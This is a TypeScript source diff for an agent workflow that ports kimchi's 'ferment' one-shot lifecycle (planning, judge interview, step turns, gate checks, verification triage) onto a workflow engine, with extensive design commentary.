+ * does — the same planning process, the same P/S/F/C gate registry, the same budget tiers, the same judge
+ * standing in for the user, the same verification triage — with exactly one thing removed.
+ *
+ * ## What is removed, and why it is the whole point
+ *
+ * In kimchi the ferment lifecycle runs inside ONE session. The model is holding the plan, the phase, the
+ * step it is in the middle of doing and the gate verdicts it is about to give, all at once, and after
+ * every tool call it has to choose to keep going. When it doesn't, the extension makes it: `maybeInjectFermentStopNudge` re-sends the next
+ * action when a turn ends early, `scheduleNextFermentAction` renders "call start_ferment_step now" with
+ * the ids filled in, `maybeInjectScopingProgressNudge` counts exploration turns, the lifecycle
+ * obligation guard catches text-only stops, and the one-shot envelope carries a "## Turn discipline"
+ * section telling it not to stall. That machinery is not decoration — dropping the scope nudge alone
+ * accounted for 16 of 31 scored failures in one terminal-bench run.
+ *
+ * None of it is needed here. The engine decides what runs next, so a step that "stops early" has simply
+ * finished; there is no turn to nudge, no lifecycle to remind anyone of, and no way to stall between
+ * stages. Every prompt in `ferment/prompts.ts` therefore keeps kimchi's instruction text and drops its
+ * orchestration text (see that file's header for the line-by-line provenance).
+ *
+ * ## The other differences, all forced, all small
+ *
+ * The point of this workflow is that the ONLY interesting variable is engine-vs-session, so everything
+ * below is a difference the medium forces, not a design choice — and there is deliberately no scheduling
+ * policy of any kind (see "Budgets").
+ *
+ *  - **Phases and steps run sequentially.** kimchi's `parallel_group` is dropped from the plan schema
+ *    rather than silently ignored: a `.foreach` above concurrency 1 requires non-overlapping side
+ *    effects, which two agents editing one container's filesystem cannot promise.
+ *  - **`budget_tier` moves into the plan.** kimchi picks it per step at `start_ferment_step`; that turn
+ *    is orchestration, so the tier is chosen once, at plan time, in the planner's own words. It is
+ *    ADVICE in the prompt at both ends — see "Budgets".
+ *  - **Structured output replaces tool calls.** A gate payload that was a `complete_ferment_step`
+ *    argument is now the step's output schema; the engine validates and steers on it.
+ *  - **Every agent step is `optional`.** In kimchi a failing turn is a tool error the session survives;
+ *    here the equivalent is a step whose failure does not take the run down with it.
+ *
+ * ## The worker that was here, and why it is gone
+ *
+ * Until now this file dispatched a `worker` subagent per step and had a separate turn rule on its report.
+ * **kimchi's one-shot ferment dispatches nobody.** `start_ferment_step` offers both branches in so many
+ * words — "Either spawn a subagent … or execute the step directly using bash/edit/write. … If you
+ * executed directly, call complete_ferment_step with just the summary and gates (worker_agent_id is
+ * optional)" — and six live native runs take the second one every time: all 31 `complete_ferment_step`
+ * calls with `worker_agent_id` absent, and the orchestrator session itself spending 108 `bash`, 16
+ * `write` and 13 `edit` calls, with zero agent spawns.
+ *
+ * So a step is ONE agent turn on the orchestrator's own session: it does the work with its tools and then
+ * answers S1/S2/S3 about that work. The gate registry's second person stops being a courtesy and becomes
+ * a fact — "Read **your own** summary" is addressed to the agent that wrote it because it did the work.
+ *
+ * Three pieces of machinery went with the worker, and all three were sound repairs to a shape kimchi does
+ * not have. They are recorded here rather than quietly deleted, because each was added on measurement:
+ *
+ *  - the **tier box** (`maxDurationMs` from `FERMENT_WORKER_BUDGETS`), the **landing instruction** ("STOP
+ *    WORKING AT Ns AND WRITE YOUR REPORT") and the **kill-and-escalate** ladder (`tierForAttempt`,
+ *    `escalateTier`, `worker-landing`). All three existed because a dispatched subagent killed at its cap
+ *    returns NOTHING — 46.0 min of one 6-task run went that way, 6 of 11 workers on a single task. There
+ *    is no separate process to kill when the orchestrator does the work in its own session, so there is
+ *    nothing to box, nothing to land inside, and nothing to escalate;
+ *  - the **gate box** (`STEP_GATE_MAX_MS = 180s`), added because a gate turn that was a tool call in
+ *    kimchi had become a subagent here and one had run 1472s against a p75 of 57s. The turn it was boxing
+ *    no longer exists as a separate turn;
+ *  - the **step diff block** (`step-diff`), which pasted a gathered diff into a gate turn that had not
+ *    seen the work — 92.4 min of gate turns over that run, against 23 min if each had cost its own task's
+ *    fastest. The reader has now made the edits itself, and what it gets instead is the one thing kimchi
+ *    gives its orchestrator: the step's start ref (`stepStartRefs`, "consumed at complete_ferment_step for
+ *    diff evidence", surfaced as a SHA in `derive-state.ts`). kimchi assembles a step diff for nobody.
+ *
+ * ## Shape
+ *
+ *   scoping = (plan → judge?)*                          until the plan has phases and no open questions
+ *   phases  = foreach phase
+ *               refine?                                 only a phase the plan left with no steps
+ *               steps = foreach step
+ *                         (step turn → gate check → verify → triage? → check)*
+ *               close = (rework? → F gates → grade? → decide)*
+ *   ship    = the C gates                               once every phase is terminal
+ *
+ * The loops are where a ferment's "refuses advancement" lives, and they are NOT the same refusal. Reading
+ * them as one is the single most expensive mistake this port has made:
+ *
+ *  - a flagged S gate refuses ONE COMPLETION and nothing else. kimchi is explicit: "Step-level flags
+ *    don't feed the phase retry/escalation pipeline - they just refuse this single call, and the agent
+ *    has to fix the underlying issue and re-call" (tools/steps.ts:427). Nothing is recorded and the
+ *    verification never runs — "Gate validation runs BEFORE any state mutation" — and the step turn is
+ *    re-entered on its own session holding kimchi's refusal text, where it may work some more before
+ *    answering again. That is the same conversation continuing, not a second opinion being bought;
+ *  - a verification the triage judge calls real sends the STEP back, into that same session, told what
+ *    the command actually printed (kimchi's rule: "a bounded direct continuation … do not raise the
+ *    limits and retry the same broad task");
+ *  - a PHASE that clears its F gates then has to clear the grader as well — A/B advance, C/D/F refuse
+ *    and buy a rework, up to `MAX_BLOCK_RETRIES` times, after which the grade is accepted and the phase
+ *    advances anyway. This is the piece of kimchi that is easiest to mistake for a report: the letter
+ *    grade drives control flow, and an earlier version of this file omitted it entirely.
+ *
+ * The first two used to be two nested loops, because one re-ran a cheap gate turn and the other bought a
+ * fresh cold worker. Both are now the same act — re-enter the session that did the work — so they are one
+ * loop with one counter, and what differs is only what the turn is told and whether the verification is
+ * reached.
+ */
+import { type Static, Type } from "typebox"
+import { createAgentStep, createStep, createWorkflow, type RunContext } from "@kimchi-dev/kimchi-workflows"
+import {
+	ASK_USER_FORM_MAX_ATTEMPTS,
+	budgetTier,
+	defaultAnswerForQuestion,
+	FERMENT_WORKER_BUDGETS,
+	gradeRefuses,
+	hasBlockingFlag,
+	judgeAnswersSchema,
+	MAX_BLOCK_RETRIES,
+	minimumAcceptableGrade,
+	normalizeVerdict,
+	type PhaseGrade,
+	type PhaseItem,
+	type PlannedStep,
+	phaseGatesSchema,
+	phaseGradeSchema,
+	phaseItemSchema,
+	planSchema,
+	refineSchema,
+	type StepItem,
+	shipGatesSchema,
+	stepGatesSchema,
+	stepItemSchema,
+	taskInputSchema,
+	verifyResultSchema,
+	verifyTriageSchema,
+	workerReportSchema,
+} from "./ferment/contract.ts"
+import {
+	judgePrompt,
+	phaseGatesPrompt,
+	phaseGraderPrompt,
+	phaseReworkPrompt,
+	planPrompt,
+	refinePrompt,
+	shipPrompt,
+	stepTurnPrompt,
+	verifyTriagePrompt,
+} from "./ferment/prompts.ts"
+import { currentGitRef, type DiffEvidence, phaseDiffSince, runVerification } from "./ferment/verify.ts"
+
+type Task = Static<typeof taskInputSchema>
+type Plan = Static<typeof planSchema>
+type JudgeAnswers = Static<typeof judgeAnswersSchema>
+type StepGates = Static<typeof stepGatesSchema>
+type PhaseGates = Static<typeof phaseGatesSchema>
+type VerifyResult = Static<typeof verifyResultSchema>
+type Triage = Static<typeof verifyTriageSchema>
+
+// -- Budgets -----------------------------------------------------------------------------------------
+//
+// NOTHING here is sized from what is left. A ferment runs until the work is done; it never divides a
+// budget across its stages, never sizes a turn from the remaining clock, and never tells a model how much
+// of the run it may have. Adding any of that would be inventing scheduling policy kimchi does not have,
+// and a first run of this workflow showed exactly what that costs: per-stage boxes fed on what earlier
+// stages had spent, so `phase-gates` was granted 307ms and `ship` a NEGATIVE box — the two closing gate
+// turns never ran, and the ship verdict was decided by arithmetic instead of by evidence.
+//
+// **A step turn now carries no wall clock at all, and that is the deliberate cost of the merge.** kimchi
+// bounds this turn with nothing but the run's own deadline: `complete_ferment_step` is a tool call inside
+// a session the harness owns, and the work before it is that same session's tool calls. There is no
+// second process to box once the orchestrator does the work, so boxing it would be inventing a bound
+// kimchi does not have — which is what the old `worker` tier box and `STEP_GATE_MAX_MS` were, honestly
+// arrived at and no longer applicable. The tier survives as PROMPT TEXT, exactly as kimchi's `limitsHint`
+// survives on the branch where no Agent is ever spawned.
+//
+// What that buys, stated plainly: a step turn that runs away now spends the RUN's clock rather than its
+// own, and the phases behind it get less. That is the same exposure kimchi carries, at the same level.
+//
+// The single deadline that does exist is harbor's own agent-phase timeout,
+// and this workflow is never told what it is and computes nothing from it — there used to be an
+// in-process `extension.ts` that read `TB_AGENT_TIMEOUT_SEC`, built its own deadline and aborted the run
+// a safety margin before the harness would kill it; that adapter is gone (the workflow now starts via the
+// ordinary `/workflow run ferment-oneshot` command surface), and harbor does not hand this deadline to any
+// non-oracle agent to begin with. What replaces it is the same protection kimchi itself relies
+// on: harbor cancels the agent phase from outside the container when its own `[agent] timeout_sec` fires,
+// `Kimchi.run` catches that cancellation and terminates the recorded process group, and the container is
+// graded in whatever state that leaves it — the whole run bounded from the outside, not the individual
+// turn, and not by anything this workflow tracks.
+//
+// One constant box is left in this file, on `phase-rework` — the only turn still handed to an agent of
+// its own rather than taken by the orchestrator — and it is kimchi's own `standard` tier, not a share of
+// anything.
+
+/**
+ * The one conversation kimchi's orchestrator has, named so several steps can share it
+ * (`resumable: "<key>"`).
+ *
+ * In kimchi there is no such thing as "the planning agent", "the working agent" and "the gate agent":
+ * `scope_ferment`, `start_ferment_step`, the bash/edit/write that follow it, `complete_ferment_step`,
+ * `complete_ferment_phase` and `complete_ferment` are all one session's turns. That is why every gate is
+ * written in the second person, why C1 can walk a checklist "declared at scope time" — it declared it —
+ * and why S1 can ask about "your own summary": it did the work the summary is about. Keyed per step
+ * instead, each of those turns would meet the others' output as text it was handed.
+ *
+ * The steps holding this key run strictly sequentially (no `.foreach` here exceeds concurrency 1), which
+ * is what makes sharing legal: `.commit()` rejects a shared key on anything that can overlap, because
+ * two subagents appending to one session file would interleave into nonsense.
+ */
+const ORCHESTRATOR_SESSION = "orchestrator"
+
+/**
+ * How many times a step's turn may run: the refusals of its completion and the continuations after a
+ * failed verification, counted together because they are now the same act.
+ *
+ * kimchi caps NEITHER — "step-level flags don't feed the phase retry/escalation pipeline, they just
+ * refuse this single call", and the orchestrator re-calls until it passes, or resolves the step
+ * explicitly with skip/fail. Neither of those exists as a turn in this workflow, so some bound is
+ * unavoidable; it borrows `MAX_BLOCK_RETRIES`, the only retry budget kimchi actually defines, rather
+ * than inventing a second number.
+ *
+ * It was 2, chosen when a refusal re-ran a cold subagent that could never change its mind. It then became
+ * two nested budgets, one per loop. It is one number again because there is one loop again: the same
+ * session is re-entered either way, so `STEP_MAX_ATTEMPTS` re-entries is the whole of a step's budget
+ * rather than one factor of a product.
+ */
+const STEP_MAX_ATTEMPTS = MAX_BLOCK_RETRIES
+
+const intentOf = (ctx: RunContext): string => ctx.getInitData<Task>()?.instruction ?? "(missing)"
+
+/**
+ * A read whose absence can only mean a WIRING bug, not a step that was skipped.
+ *
+ * The engine's data flow has one genuinely sharp edge: a mis-addressed `getStepResult` returns
+ * `undefined`, which is indistinguishable from "that step has not run yet" (only an
+ * in-flight read throws). Defaulting such a read is how a bug survives a whole run: `phase-result` read
+ * the F verdicts and the grade by bare name from outside the closing loop, got `undefined`, substituted
+ * "(no phase summary)" / "(ungraded)", and `ship` was handed an empty table without anything failing.
+ *
+ * So reads that CANNOT legitimately be empty — the item a foreach handed this body, a function step
+ * that has no failure mode — go through here and fail loudly instead.
+ */
+function mustRead<T>(ctx: RunContext, nameOrPath: string, why: string): T {
+	const value = ctx.getStepResult<T>(nameOrPath)
+	if (value === undefined) {
+		throw new Error(
+			`getStepResult("${nameOrPath}") is undefined, but ${why}. This is an addressing bug, not a skipped step.`,
+		)
+	}
+	return value
+}
+
+// -- Names shared between a branch and its readers ---------------------------------------------------
+
+const JUDGE_ARM = "judge-round"
+const REFINE_ARM = "refine-phase"
+const TRIAGE_ARM = "verify-triage"
+const REWORK_ARM = "phase-rework-round"
+const GRADE_ARM = "phase-grade-round"
+
+// -- Scoping ----------------------------------------------------------------------------------------
+
+type ScopeCheck = {
+	ready: boolean
+	plan: Plan | undefined
+	asked: { id: string; question: string }[]
+	answers: JudgeAnswers | undefined
+}
+
+const scopeCheckSchema = Type.Object({
+	ready: Type.Boolean(),
+	plan: Type.Optional(planSchema),
+	asked: Type.Array(Type.Object({ id: Type.String(), question: Type.String() })),
+	answers: Type.Optional(judgeAnswersSchema),
+})
+
+/**
+ * The best plan so far, carried into this round.
+ *
+ * It has to be carried rather than re-read: a step may not observe itself, and `plan` is
+ * `optional`, so a round whose planner failed would otherwise erase a usable plan an earlier round had
+ * already produced.
+ */
+const scopeCarry = createStep({
+	name: "scope-carry",
+	description: "The plan carried into this scoping round",
+	output: Type.Object({ plan: Type.Optional(planSchema) }),
+	run: ({ ctx }) => ({ plan: ctx.getStepResult<ScopeCheck>("scoping/scope-check")?.plan }),
+})
+
+const plan = createAgentStep({
+	name: "plan",
+	description: "Scope the intent into a ferment plan: goal, criteria, phases, steps, gates",
+	output: planSchema,
+	background: true,
+	// A second round is a REPLAN with the judge's answers in hand, not a fresh start — the same
+	// continuity kimchi gets for free from running scoping inside one session.
+	//
+	// The key is SHARED with every other turn kimchi's orchestrator owns (`step-turn`, `phase-gates`,
+	// `ship`): in kimchi those are all turns of the one session that wrote this plan, so the agent DOING a
+	// step is the agent that scoped it and knows why it is scoped that way. Sharing the key is what makes
+	// that true here; without it every later turn meets the plan as text it was handed.
+	resumable: ORCHESTRATOR_SESSION,
+	optional: true,
+	retry: { maxRetry: 0 },
+	prompt: ({ ctx }) => {
+		const previous = ctx.getStepResult<ScopeCheck>("scope-check")
+		return planPrompt({ intent: intentOf(ctx), answers: previous?.answers, questionsAsked: previous?.asked })
+	},
+})
+
+/**
+ * The judge standing in for the user (kimchi's `askJudgeForm`). One-shot scoping still runs the
+ * interview — it just routes it to a model that decides, because there is nobody to ask.
+ */
+const judge = createAgentStep({
+	name: "judge",
+	description: "Answer the planner's decision-blocking questions as the user would",
+	output: judgeAnswersSchema,
+	background: true,
+	optional: true,
+	// kimchi loops the judge call up to ASK_USER_FORM_MAX_ATTEMPTS, re-sending it with "your previous
+	// response was not valid or did not match the expected schema" appended, and only then falls back to
+	// defaults. A `background` step cannot be steered in-session, so repair is
+	// not possible — the equivalent is a fresh attempt per retry, which is what
+	// kimchi's loop does anyway.
+	//
+	// Measured: without this, a judge that answered in prose ("I have al…") failed the step outright and
+	// the planner's question went permanently unanswered.
+	retry: { maxRetry: ASK_USER_FORM_MAX_ATTEMPTS - 1 },
+	prompt: ({ ctx }) => judgePrompt({ intent: intentOf(ctx), plan: ctx.getStepResult<Plan>("plan") }),
+})
+
+const judgeRound = createWorkflow({ name: JUDGE_ARM }).then(judge).commit()
+
+/** Whether the interview runs at all: exactly kimchi's rule — it runs when the planner asked something. */
+const wantsJudge = (ctx: RunContext): boolean => (ctx.getStepResult<Plan>("plan")?.questions?.length ?? 0) > 0
+
+const scopeCheck = createStep({
+	name: "scope-check",
+	description: "Is the plan ready to run",
+	output: scopeCheckSchema,
+	run: ({ ctx, logger }) => {
+		const drafted =
+			ctx.getStepResult<Plan>("plan") ?? ctx.getStepResult<{ plan: Plan | undefined }>("scope-carry")?.plan
+		const judged = ctx.getStepResult<Record<string, JudgeAnswers | undefined>>("interview")?.[JUDGE_ARM]
+		const questions = drafted?.questions ?? []
+		const asked = questions.map((question) => ({ id: question.id, question: question.question }))
+
+		// kimchi's fallback: when the judge is unreachable after every attempt it does NOT proceed with the
+		// question unanswered — it answers on the judge's behalf with conservative defaults, "rather than
+		// abandoning the ferment". A question that reaches the planner unanswered is the one outcome the
+		// one-shot interview is built to avoid, so the same substitution happens here.
+		const answers =
+			judged ??
+			(questions.length > 0
+				? {
+						answers: questions.map(defaultAnswerForQuestion),
+						rationale: `Judge was unavailable after ${ASK_USER_FORM_MAX_ATTEMPTS} attempts; using conservative defaults.`,
+					}
+				: undefined)
+
+		// Ready means what `scope_ferment` means in kimchi: a plan with phases and nothing still being
+		// asked. An unanswered question is what another round is FOR — and since the fallback above always
+		// produces answers, a round that asked always gets one more round to fold them in.
+		const hasPlan = (drafted?.phases?.length ?? 0) > 0
+		const ready = hasPlan && !(asked.length > 0 && answers !== undefined)
+		logger.info("scoping round finished", {
+			hasPlan,
+			questions: asked.length,
+			answeredBy: judged ? "judge" : answers ? "defaults" : "none",
+			ready,
+		})
+		return { ready, plan: drafted, asked, answers }
+	},
+})
+
+const scopeRound = createWorkflow({ name: "scope-round" })
+	.then(scopeCarry)
+	.then(plan)
+	.branch([[wantsJudge, judgeRound]], { name: "interview" })
+	.then(scopeCheck)
+	.commit()
+
+// -- One step ---------------------------------------------------------------------------------------
+
+const stepCtx = createStep({
+	name: "step-ctx",
+	description: "The step this item is about",
+	input: stepItemSchema,
+	output: stepItemSchema,
+	run: ({ input }) => input,
+})
+
+type StepCheck = {
+	done: boolean
+	attempt: number
+	index: number
+	description: string
+	summary: string
+	verdicts: string
+	verified: string
+	reason: string
+	flags: { id: string; rationale: string; evidence: string }[]
+}
+
+const stepCheckSchema = Type.Object({
+	done: Type.Boolean(),
+	attempt: Type.Number(),
+	index: Type.Number(),
+	description: Type.String(),
+	summary: Type.String(),
+	verdicts: Type.String(),
+	verified: Type.String(),
+	reason: Type.String(),
+	flags: Type.Array(Type.Object({ id: Type.String(), rationale: Type.String(), evidence: Type.String() })),
+})
+
+/**
+ * Which attempt at this step this is. Read at the TOP of the attempt, because a step may not observe
+ * itself — `step-check` cannot count its own attempts.
+ *
+ * The read is a BARE name on purpose: an explicit path is absolute, and this loop lives
+ * under whichever phase and step item it is nested in, so `attempts/step-check` would address a node
+ * that exists at the root and resolve to nothing at all. A bare name resolves lexically, to this item's
+ * own previous iteration.
+ *
+ * It used to sample a wall clock too, which `worker-landing` read to infer whether a dispatched worker
+ * had been killed at its cap. Nothing is dispatched and nothing is capped, so there is no kill to infer.
+ */
+const attemptClock = createStep({
+	name: "attempt-clock",
+	description: "Which attempt at this step this is",
+	output: Type.Object({ attempt: Type.Number() }),
+	run: ({ ctx }) => ({ attempt: (ctx.getStepResult<StepCheck>("step-check")?.attempt ?? 0) + 1 }),
+})
+
+const planOf = (ctx: RunContext): Plan | undefined => ctx.getStepResult<ScopeCheck>("scoping/scope-check")?.plan
+
+/**
+ * The steps of this phase that already ran, with what they reported — kimchi's `Prior:` line.
+ *
+ * Addressed item by item rather than through the enclosing `.foreach`'s output, which does not exist
+ * until every item has finished. Foreach item indices survive into the static key while loop iteration
+ * indices do not, so `phases@1/steps@0/attempts/step-check` names item 0's LAST attempt —
+ * exactly the record kimchi keeps on the step.
+ */
+const priorStepsOf = (
+	ctx: RunContext,
+	phaseIndex: number,
+	stepIndex: number,
+): { index: number; description: string; summary: string }[] => {
+	const prior: { index: number; description: string; summary: string }[] = []
+	for (let item = 0; item < stepIndex - 1; item++) {
+		const result = ctx.getStepResult<StepCheck>(`phases@${phaseIndex - 1}/steps@${item}/attempts/step-check`)
+		if (result?.done) prior.push({ index: result.index, description: result.description, summary: result.summary })
+	}
+	return prior
+}
+
+const tierOf = (step: PlannedStep | undefined) => budgetTier(step?.budget_tier)
+
+/**
+ * The step: kimchi's `start_ferment_step`, the work, and `complete_ferment_step`, in the one turn that
+ * does all three.
+ *
+ * ## Who does the work, and the reading that got this wrong twice
+ *
+ * kimchi offers its orchestrator two branches at `start_ferment_step`: "Either spawn a subagent … or
+ * execute the step directly using bash/edit/write. … If you executed directly, call
+ * complete_ferment_step with just the summary and gates (worker_agent_id is optional)". One-shot ferment
+ * takes the direct branch every time — 31 of 31 completions across six live runs with `worker_agent_id`
+ * absent, 108 `bash` / 16 `write` / 13 `edit` calls made by the orchestrator session itself, 0 spawns.
+ *
+ * This port modelled the other branch, and paid for it twice over. First it made the gate turn an
+ * INDEPENDENT cold reviewer, on the argument that S1 ("does the summary describe work present in the
+ * diff?") is "only a real question when you have not written the summary yourself" — which measured 30
+ * refusals in 33 step attempts across five runs, the S gates never once passing a step they had already
+ * flagged. Then it kept a dispatched worker and merely resumed the reviewer, which fixed the refusals but
+ * left a whole extra agent, its box, its landing instruction and its escalation ladder in place — every
+ * one of them machinery for a subagent kimchi never spawns.
+ *
+ * So this is ONE agent step: it does the work with its tools, then answers S1/S2/S3 about what it did.
+ * That is what makes the registry's second person literally true — "Read your own summary" is addressed
+ * to the agent that wrote the summary because it did the work — and it is why a flag can be refused
+ * straight back here (`gate-check`): resolving it is this agent's own turn, in this conversation, with
+ * the same tools it used the first time.
+ *
+ * It shares `ORCHESTRATOR_SESSION` with `plan`, `phase-gates` and `ship`, because in kimchi all of them
+ * are turns of one session. No `maxDurationMs`: there is no separate process to box, and kimchi bounds
+ * this turn with nothing but the run's deadline (see "Budgets").
+ */
+const stepTurn = createAgentStep({
+	name: "step-turn",
+	description: "Do this step's work, then answer the step-scope gates on what you did",
+	output: stepGatesSchema,
+	background: true,
+	optional: true,
+	retry: { maxRetry: 0 },
+	// The orchestrator's own conversation, and the reason a refusal can be sent straight back into it: the
+	// agent re-entering has its work, its verdicts and kimchi's refusal text, and can act on all three.
+	resumable: ORCHESTRATOR_SESSION,
+	prompt: ({ ctx }) => {
+		const phase = ctx.getStepResult<PhaseItem>("phase-ctx")
+		const item = ctx.getStepResult<StepItem>("step-ctx")
+		const attempt = ctx.getStepResult<{ attempt: number }>("attempt-clock")?.attempt ?? 1
+		const last = ctx.getStepResult<StepCheck>("step-check")
+		// The verification this step has already been through, which exists only from the SECOND attempt on:
+		// kimchi runs the verify command inside `complete_ferment_step`, AFTER the gates, and a refused call
+		// never reaches it at all. Reordering it to feed a first attempt would change what a refusal costs.
+		const verified = ctx.getStepResult<VerifyResult>("verify")
+		return stepTurnPrompt({
+			plan: planOf(ctx),
+			phaseIndex: phase?.index ?? 1,
+			phaseCount: phase?.total ?? 1,
+			phase: phase?.phase ?? { name: "(unknown)", goal: "(unknown)" },
+			stepIndex: item?.index ?? 1,
+			stepCount: item?.total ?? 1,
+			step: item?.step ?? { description: "(missing)" },
+			tier: tierOf(item?.step),
+			priorSteps: priorStepsOf(ctx, phase?.index ?? 1, item?.index ?? 1),
+			startRef: ctx.getStepResult<{ ref: string }>("step-start-ref")?.ref,
+			// Everything a re-entry needs and nothing it already has: the session is resumed, so this says only
+			// what changed. `flags` picks the refusal branch, which is kimchi's gate error; anything else is the
+			// step itself coming back.
+			previous:
+				attempt > 1 && last
+					? { reason: last.reason, flags: last.flags, verify: verified?.ran === true ? verified : undefined }
+					: undefined,
+		})
+	},
+})
+
+type GateCheck = {
+	refused: boolean
+	summary: string
+	verdicts: string
+	flags: { id: string; rationale: string; evidence: string }[]
+}
+
+const gateCheckSchema = Type.Object({
+	refused: Type.Boolean(),
+	summary: Type.String(),
+	verdicts: Type.String(),
+	flags: Type.Array(Type.Object({ id: Type.String(), rationale: Type.String(), evidence: Type.String() })),
+})
+
+/**
+ * kimchi's gate validation, which runs at the TOP of `completeStep` and before any state mutation: a
+ * flagged verdict refuses this one call and nothing else happens — no verification, no step record.
+ *
+ * "Step-level flags don't feed the phase retry/escalation pipeline - they just refuse this single call,
+ * and the agent has to fix the underlying issue and re-call" (tools/steps.ts:427). Re-calling is exactly
+ * what the next iteration of this loop does, into the session that flagged.
+ *
+ * A turn that produced NOTHING has no verdicts, so `hasBlockingFlag(undefined)` is false and this is not
+ * a refusal — the step is decided on its verification alone, with the gate record reading "(none)" for
+ * `phase-gates` (F1 reads every step's S2) and the grader to see. That is how every unreachable judge in
+ * this port is read: advisory, never a refusal.
+ */
+const gateCheck = createStep({
+	name: "gate-check",
+	description: "Does this completion stand, or is it refused back to the same session",
+	output: gateCheckSchema,
+	run: ({ ctx, logger }) => {
+		const gates = ctx.getStepResult<StepGates>("step-turn")
+		const flags = (gates?.gates ?? [])
+			.filter((gate) => normalizeVerdict(gate.verdict) === "flag")
+			.map((gate) => ({ id: gate.id, rationale: gate.rationale, evidence: gate.evidence }))
+
+		const refused = hasBlockingFlag(gates?.gates)
+		logger.info("completion turn finished", { refused, flags: flags.map((flag) => flag.id) })
+		return {
+			refused,
+			summary: gates?.summary ?? "(no summary)",
+			verdicts: (gates?.gates ?? []).map((gate) => `${gate.id}:${gate.verdict}`).join(" ") || "(none)",
+			flags,
+		}
+	},
+})
+
+/**
+ * kimchi runs the step's verify command itself, inside `complete_ferment_step`. So does this — and at
+ * the same point in the turn, which is AFTER the gates: "Gate validation runs BEFORE any state
+ * mutation" (tools/steps.ts:427). A refused call never reaches the verification, so neither does this.
+ */
+const verify = createStep({
+	name: "verify",
+	description: "Run the step's verification command and record what it did",
+	output: verifyResultSchema,
+	optional: true,
+	run: async ({ ctx, abortSignal, logger }) => {
+		const notRun = { ran: false, command: "", exitCode: 0, stdout: "", stderr: "" }
+		if (ctx.getStepResult<GateCheck>("gate-check")?.refused === true) return notRun
+		const command = ctx.getStepResult<StepItem>("step-ctx")?.step.verify?.trim()
+		if (!command) return notRun
+		const result = await runVerification(command, abortSignal)
+		logger.info("verification finished", { command, exitCode: result.exitCode })
+		return result
+	},
+})
+
+const verifyFailed = (ctx: RunContext): boolean => {
+	const result = ctx.getStepResult<VerifyResult>("verify")
+	return result?.ran === true && result.exitCode !== 0
+}
+
+const triage = createAgentStep({
+	name: "verify-judge",
+	description: "Classify a non-zero verification exit as benign, transient, or a real defect",
+	output: verifyTriageSchema,
+	background: true,
+	optional: true,
+	retry: { maxRetry: 0 },
+	prompt: ({ ctx }) => {
+		const item = ctx.getStepResult<StepItem>("step-ctx")
+		const result = ctx.getStepResult<VerifyResult>("verify")
+		return verifyTriagePrompt({
+			step: item?.step ?? { description: "(missing)" },
+			command: result?.command ?? "",
+			exitCode: result?.exitCode ?? 1,
+			stdout: result?.stdout ?? "",
+			stderr: result?.stderr ?? "",
+		})
+	},
+})
+
+const triageRound = createWorkflow({ name: TRIAGE_ARM }).then(triage).commit()
+
+/**
+ * kimchi's `completeStep`, as a decision rather than a tool call — same order, same precedences:
+ * a blocking gate flag refuses the completion; then a turn that produced nothing refuses it; then the
+ * verification decides, with a non-zero exit going to triage whose silence reads as `fail`.
+ *
+ * The refusals are NOT interchangeable even though they now share a loop. A flag is refused BEFORE
+ * anything is recorded and before the verification runs at all, and what it asks for is a fix and a
+ * re-vote; a failed verification is the step itself coming back, with the command's output to work from.
+ * `reason` and `flags` are what tell the next turn which of the two it is looking at.
+ */
+const stepCheck = createStep({
+	name: "step-check",
+	description: "Decide whether this step is done, or is re-entered",
+	output: stepCheckSchema,
+	run: ({ ctx, logger }) => {
+		const item = ctx.getStepResult<StepItem>("step-ctx")
+		const attempt = ctx.getStepResult<{ attempt: number }>("attempt-clock")?.attempt ?? 1
+		const completion = ctx.getStepResult<GateCheck>("gate-check")
+		const gates = ctx.getStepResult<StepGates>("step-turn")
+		const verified = ctx.getStepResult<VerifyResult>("verify")
+		const verdict = ctx.getStepResult<Record<string, Triage | undefined>>("triage")?.[TRIAGE_ARM]
+
+		const flags = completion?.flags ?? []
+
+		const verifiedLine = verified?.ran
+			? verified.exitCode === 0
+				? `exit 0 (${verified.command})`
+				: `exit ${verified.exitCode} (${verified.command}) — triage: ${verdict?.verdict ?? "fail (no verdict)"}`
+			: completion?.refused === true
+				? "not run — the completion was refused before verification"
+				: "no verification command"
+
+		let done = true
+		let reason = "gates passed and verification held"
+		if (completion?.refused === true) {
+			done = false
+			reason = `a step gate flagged: ${flags.map((flag) => flag.id).join(", ")}`
+		} else if (gates === undefined) {
+			// The turn produced nothing at all — no summary, no verdicts, so nothing was done that anyone can
+			// account for. kimchi's session would be nudged to try the step again; here that is the next
+			// iteration, which resumes the same conversation.
+			done = false
+			reason = "the step turn returned nothing — no summary and no gate verdicts"
+		} else if (verified?.ran && verified.exitCode !== 0) {
+			// kimchi's fail-safe: anything other than a clearly parsed "pass" is a failure, and a judge that
+			// never answered is not a pass.
+			const triaged = verdict?.verdict ?? "fail"
+			if (triaged === "pass") {
+				reason = `verification exited ${verified.exitCode} but triage passed it: ${verdict?.reason}`
+			} else {
+				done = false
+				reason = `verification failed (exit ${verified.exitCode}): ${verdict?.reason ?? "no triage verdict — treating as failure"}`
+			}
+		}
+
+		logger.info("step attempt finished", { step: item?.index, attempt, done, reason })
+
+		return {
+			done,
+			attempt,
+			index: item?.index ?? 0,
+			description: item?.step.description ?? "(missing)",
+			summary: completion?.summary ?? "(no summary)",
+			verdicts: completion?.verdicts ?? "(none)",
+			verified: verifiedLine,
+			reason,
+			flags,
+		}
+	},
+})
+
+/**
+ * One attempt at a step, and kimchi's own order inside `completeStep`: the gates first, because "Gate
+ * validation runs BEFORE any state mutation", then the verification the gates guard.
+ *
+ * This used to be two nested loops — an inner one that re-voted the gates alone, and an outer one that
+ * re-dispatched the worker. With one agent doing both, both loops are the same act (re-enter the session
+ * that did the work), so there is one loop, one counter, and no way for a step to cost the product of
+ * two budgets.
+ */
+const stepAttempt = createWorkflow({ name: "attempt" })
+	.then(attemptClock)
+	.then(stepTurn)
+	.then(gateCheck)
+	.then(verify)
+	.branch([[verifyFailed, triageRound]], { name: "triage" })
+	.then(stepCheck)
+	.commit()
+
+/**
+ * A step ends when it is done, or when it has had its attempts.
+ *
+ * A flag no longer ends it. That rule was here because going round again meant re-running a WORKER, which
+ * is the one thing kimchi never does for a flag — it refuses a single tool call. Going round now means
+ * re-entering the session that flagged, holding kimchi's refusal text, which is precisely what kimchi's
+ * orchestrator does. A step that leaves this loop still flagged is simply not done, and the F gates and
+ * the phase grader read it that way.
+ */
+const stepSettled = (last: StepCheck): boolean => last.done || last.attempt >= STEP_MAX_ATTEMPTS
+
+/**
